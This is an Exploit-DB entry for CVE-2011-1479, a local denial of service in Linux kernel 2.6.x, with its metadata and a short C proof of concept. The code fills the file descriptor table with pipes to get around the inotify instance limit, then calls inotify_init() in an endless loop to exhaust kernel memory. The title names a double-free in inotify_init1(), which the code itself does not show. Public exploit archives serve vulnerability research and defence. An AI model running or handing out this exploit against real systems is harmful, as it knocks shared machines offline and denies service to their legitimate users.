Linux Kernel 2.6.x - 'inotify_init1()' Double-Free Local Denial of Service

EDB-ID:

35600

CVE:

2011-1479

EDB Verified:

Author:

anonymous

Type:

dos

Exploit: /

Platform:

Linux

Date:

2011-04-11

Vulnerable App:

/*
source: https://www.securityfocus.com/bid/47296/info

The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users. 
*/

#include <sys/inotify.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        int fds[2];

        /* Circumvent max inotify instances limit */
        while (pipe(fds) != -1)
                ;

        while (1)
                inotify_init();

        return 0;
}

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services